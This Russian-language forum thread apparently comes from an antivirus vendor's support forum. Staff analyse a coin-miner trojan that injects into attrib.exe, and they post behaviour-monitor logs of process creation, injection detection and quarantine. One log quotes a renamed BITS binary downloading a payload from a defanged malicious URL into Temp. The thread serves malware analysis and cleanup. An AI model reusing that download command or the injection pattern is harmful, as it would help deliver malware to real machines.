60 ответов в этой теме

[pig]

Скажите номер тикета (#123456).

[RUSLAN221]

Скажите номер тикета (#123456).

Что за номер тикета?Где мне его найти?

[pig]

В письме, которое из вирлаба пришло.

[RUSLAN221]

В письме, которое из вирлаба пришло.

Оно?

drweb.com #7978020

drweb.com #7978018

[Konstantin Yudin]

Нет. Им скорее всего из батника выставляют атрибуты файлам/каталогам троя.
        C:\ProgramData\DirectX\help.exe - Microsoft Trojan:Win32/CoinMiner.CF!bit
        Всё таки, майнер присутствует.
 
    Я не говорил, что майнера нет. Я сказал, что никто в здравом уме не инжектится в attrib.exe.

Объясните тогда дураку, почему запущенный майнер не грузит процессор, а attrib.exe целое ядро занял.

+1, не сходится что то. attrib.exe к тому же запускают без параметров.

id: 428109, timestamp: 19:23:07.023, type: PsCreate (16), flags: 1 (wait: 1), cid: 10908/17220:\Device\HarddiskVolume2\ProgramData\DirectX\help.exe
source context: start addr: 0xe4757f, image: 0xe40000:\Device\HarddiskVolume2\ProgramData\DirectX\help.exe
created process: \Device\HarddiskVolume2\ProgramData\DirectX\help.exe:10908 --> \Device\HarddiskVolume2\Windows\SysWOW64\attrib.exe:9956
bitness: 32, ilevel: high, sesion id: 1, type: 0, reason: 0, new: 0, dbg: 0, wsl: 0
curdir: C:\Windows\system32\, cmd: "C:\Windows\System32\attrib.exe"
status: signed_microsoft, spc / signed_microsoft / clean
id: 428109 ==> allowed [2], time: 0.276212 ms

[Konstantin Yudin]

id: 9492, timestamp: 22:30:11.448, type: PsCreate (16), flags: 1 (wait: 1), cid: 1200/7272:\Device\HarddiskVolume2\Windows\System32\cmd.exe
source context: start addr: 0x4a8590b4, image: 0x4a850000:\Device\HarddiskVolume2\Windows\System32\cmd.exe
created process: \Device\HarddiskVolume2\Windows\System32\cmd.exe:1200 --> \Device\HarddiskVolume2\Windows\SysWOW64\7749134.exe:8252
bitness: 32, ilevel: high, sesion id: 1, type: 0, reason: 0, new: 0, dbg: 0, wsl: 0
curdir: C:\Windows\system32\, cmd: "C:\Windows\SysWOW64\7749134.exe" /TRANSFER RXNyyWPdeBS /DownLoad /priOrITy HIGh hxxp://solikenezw.com/gpr.zip "C:\Users\27C6~1\AppData\Local\Temp\8491609.zip"
status: signed_microsoft, spc / signed_microsoft / clean
id: 9492 ==> allowed [2], time: 0.818811 ms

[Konstantin Yudin]

7749134.exe похоже переименованный майкрософт бинарь. скорее всего bits

[Konstantin Yudin]

url уже был забанен. не интересно

[Ivan Korolev]

 

Нет. Им скорее всего из батника выставляют атрибуты файлам/каталогам троя.

        C:\ProgramData\DirectX\help.exe - Microsoft Trojan:Win32/CoinMiner.CF!bit

        Всё таки, майнер присутствует.

 

    Я не говорил, что майнера нет. Я сказал, что никто в здравом уме не инжектится в attrib.exe.

Объясните тогда дураку, почему запущенный майнер не грузит процессор, а attrib.exe целое ядро занял.

 

Ну ок, ошибся. Бывает.

[Konstantin Yudin]

Ну и инжектов не видно. Либо мы не распознали

[RUSLAN221]

Ну и инжектов не видно. Либо мы не распознали

Так,и что делать с этой гадостью?

[AndreyKa]

 

Ну и инжектов не видно. Либо мы не распознали

Так,и что делать с этой гадостью?

 

Базы антивируса обновить, запустить быструю проверку сканера.

[AndreyKa]

Ну и инжектов не видно. Либо мы не распознали

Может, это - https://habrahabr.ru/post/344376/

[Konstantin Yudin]

Глянем.

[RUSLAN221]

Результаты быстрого сканирования.

[RUSLAN221]

почему я не могу прикрепить скриншот ?

[Dmitry_rus]

1. пробуйте в полном редакторе.

2. скрины не всегда информативны. логи гораздо лучше.

[Konstantin Yudin]

у меня все ловится

id: 7044, timestamp: 16:29:26.536, type: PsInject (43), flags: 1 (wait: 1)
sid: S-1-5-21-1462497246-3409351728-3157104118-1000, cid: 1720/2676:\Device\HarddiskVolume2\se\1\vir.exe
context: start addr: 0x10f757f, image: 0x10f0000:\Device\HarddiskVolume2\se\1\vir.exe
hips: type: 18, action: ask [0]
fileinfo: size: 659456, easize: 39, attr: 0x20, buildtime: 29.11.2017 02:46:16.000, ctime: 16.12.2017 16:10:55.337, atime: 16.12.2017 16:10:55.337, mtime: 16.12.2017 12:41:13.005, descr: , ver: , company: , oname:
hash: 5928c5f4f16d014aa9daa266b0fed1ebcbe4fc70 status: unsigned, pe32, new_pe / unsigned / unknown / unknown
inject: ChangeThreadContext [2], flags: 0x10, addr: 0x77c56058, param: 0x0, len: 0, target: bitness: 32, init: 0, image: \Device\HarddiskVolume2\Windows\System32\attrib.exe:3608
start address code:
77c56058: 89442404 mov [esp+0x4], eax
77c5605c: 895c2408 mov [esp+0x8], ebx
77c56060: e95be50100 jmp 0x77c745c0
...
fileinfo: size: 16384, easize: 0, attr: 0x20, buildtime: 14.07.2009 02:15:01.000, ctime: 14.07.2009 02:15:01.289, atime: 14.07.2009 02:15:01.289, mtime: 14.07.2009 04:14:12.283, descr: Attribute Utility, ver: 6.1.7600.16385 (win7_rtm.090713-1255), company: Microsoft Corporation, oname: ATTRIB.EXE
catfile: {F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ntexe.cat
hash: c10b6995861da38e538a1ffd5acc0bb3fc147a6c status: signed_catroot, sfc, pe32 / signed_catroot / unknown / unknown
inject type: unknown func call from image: \Device\HarddiskVolume2\Windows\System32\ntdll.dll
threat: DPH:Trojan.Inject.2.16 ==> send user alert and wait action...
user selected action: deny [5]
path: \Device\HarddiskVolume2\se\1\vir.exe ==> denied access to file
process: \Device\HarddiskVolume2\se\1\vir.exe:1720 ==> suspended all threads in process
path: \Device\HarddiskVolume2\se\1\vir.exe ==> quarantined
process: \Device\HarddiskVolume2\se\1\vir.exe:1720 ==> terminated
disinfect: \Device\HarddiskVolume2\se\1\vir.exe ==> quarantined, reboot required [1000008]
threat: DPH:Trojan.Inject.2.16 ==> sended user virus found alert
analyze object behavior and find traces:
can't find traces for object: \Device\HarddiskVolume2\se\1\vir.exe
id: 7044 ==> denied [5], time: 25662.905000 ms

убил пол часа чтобы запустить этого трояна. собран в дебаг режме с динамическим дебаг си рантаймом. под 7 фиг запустишь по дефолту.

Ну и инжектов не видно. Либо мы не распознали

Может, это - https://habrahabr.ru/post/344376/

не оно

[Konstantin Yudin]

это я смотрел на win 7 x86. а вот на win 7 x64 все хуже и проще, процесс падает сразу после старта. видно еще на этапе подготовки к инжекту все помирает..

id: 218, timestamp: 16:39:45.631, type: PsDelete (17), flags: 1 (wait: 1)
sid: S-1-5-21-3297392936-389937181-1225957448-1000, cid: 2264/2412:\Device\HarddiskVolume2\Windows\SysWOW64\WerFault.exe
context: start addr: 0x2e80c7, image: 0x2e0000:\Device\HarddiskVolume2\Windows\SysWOW64\WerFault.exe
terminated win process: \Device\HarddiskVolume2\Windows\SysWOW64\WerFault.exe:2264
fileinfo: size: 360448, easize: 0, attr: 0x20, buildtime: 14.07.2009 02:27:21.000, ctime: 14.07.2009 02:27:32.549, atime: 14.07.2009 02:27:32.549, mtime: 14.07.2009 04:14:44.872, descr: Windows Problem Reporting, ver: 6.1.7600.16385 (win7_rtm.090713-1255), company: Microsoft Corporation, oname: WerFault.exe
catfile: {F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
hash: f43f28cc5165608e6fb3794e9a3d083ca2c75f0e status: signed_catroot, sfc, pe32 / signed_catroot / unknown / unknown
id: 218 ==> undefined [1], time: 0.059200 ms

16:39:45.631 2676

id: 219, timestamp: 16:39:45.631, type: PsDelete (17), flags: 1 (wait: 1)
sid: S-1-5-21-3297392936-389937181-1225957448-1000, cid: 1892/1928:\Device\HarddiskVolume2\ark\vir\vir.exe
context: start addr: 0x74527ed5, image: 0x74400000:\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
terminated win process: \Device\HarddiskVolume2\ark\vir\vir.exe:1892
fileinfo: size: 659456, easize: 39, attr: 0x20, buildtime: 29.11.2017 02:46:16.000, ctime: 16.12.2017 16:39:32.178, atime: 16.12.2017 16:39:32.178, mtime: 16.12.2017 12:41:13.005, descr: , ver: , company: , oname:
hash: 5928c5f4f16d014aa9daa266b0fed1ebcbe4fc70 status: unsigned, pe32, new_pe / unsigned / unknown / unknown
id: 219 ==> undefined [1], time: 0.103900 ms

[Konstantin Yudin]

похоже на x64 этот трой не живой